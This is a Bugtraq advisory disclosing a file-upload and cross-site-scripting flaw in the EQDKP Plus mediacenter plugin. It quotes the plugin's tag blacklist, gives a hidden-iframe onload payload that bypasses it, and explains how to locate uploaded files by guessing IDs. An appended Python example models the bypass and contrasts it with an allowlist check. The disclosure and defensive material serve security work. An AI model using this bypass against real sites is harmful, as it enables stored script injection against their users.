bugtraq logo Bugtraq mailing list archives

EQDKP plus Cross Site Scripting and Bypass file extension
From: "iPower N/A" <vb.win32 () gmail com>
Date: Fri, 17 Jun 2011 06:59:49 +0400

Hello!

I have found a vulnerability in the EQDKP Plus.
More precisely in the plugin mediacenter.

Because the file extension is checked incorrectly,
it is possible to upload an "htm" file and execute
an XSS attack.

But with some restrictions. The plugin checks the contents for tags:

[code=plugins/mediacenter/include/mediacenter.class.php:421]
function check_content($fieldname){
    // Blacklist of tag names that are searched for in the uploaded content
    $disallowed = "body|head|html|img|plaintext|a href|pre|script|table|title|php";
    $disallowed_content = explode('|', $disallowed);
    if (empty($disallowed_content))
    {
        return false;
    }
[/code]

To get around this, you can use the following construct:
[code]
<iframe src="http://yandex.ru" style="display: none" onload="alert('XSS')">
</iframe>
[/code]

After downloading the file to the server, you can find the file at:
http://site.com/dkp/plugins/mediacenter/index.php?mode=ajax&id=[ID]
[ID] is found by simple exhaustive search.

Example:
http://www.eqdkp-plus.com/demo06/data/d2c0752ce264405a0555a3825c2494f2/mediacenter/thumbs_b/ee5bb2c59c237307d61bcb0bae1e08f2.htm

Vulnerable versions: <=0.6.4.5

P.S.
 Sorry for my bad English. :)

 Best Regards,
 iPower.
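Added example (not part of the advisory above and not EQDKP Plus code): a Python model of why the tag blacklist quoted from mediacenter.class.php does not stop the iframe payload, beside an allowlist-style upload check that a defender would use instead. The substring-matching behaviour of the blacklist and the image-only allowlist are assumptions for illustration.

```python
# Tag blacklist as quoted from mediacenter.class.php in the advisory.
DISALLOWED = "body|head|html|img|plaintext|a href|pre|script|table|title|php".split("|")

# Constructed sample input: the iframe payload shown in the advisory.
IFRAME_PAYLOAD = (
    '<iframe src="http://yandex.ru" style="display: none" onload="alert(\'XSS\')">\n'
    '</iframe>'
)


def blacklist_check(content: str) -> bool:
    """Model of the plugin's approach (assumption: case-insensitive substring
    search for each disallowed word). Returns True if the content is accepted.
    Any tag or attribute not on the list, such as iframe/onload, slips through."""
    lowered = content.lower()
    return not any(word in lowered for word in DISALLOWED)


# Hardened approach: allowlist of expected media types, verified by extension
# AND by file signature, so an .htm (or a renamed HTML file) is never stored
# under the media directory in the first place.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def allowlist_check(filename: str, data: bytes) -> bool:
    """Accept only if the final extension is an allowed image type and the
    file signature matches that same type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False
    expected = "jpg" if ext == "jpeg" else ext
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind == expected
    return False  # no recognised image signature: reject


if __name__ == "__main__":
    print("blacklist accepts iframe payload:", blacklist_check(IFRAME_PAYLOAD))
    print("allowlist accepts page.htm:", allowlist_check("page.htm", IFRAME_PAYLOAD.encode()))
```

Serving stored uploads with a fixed image Content-Type and `X-Content-Type-Options: nosniff` is a complementary mitigation, since it stops the browser rendering a stored file as HTML even if validation is bypassed.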
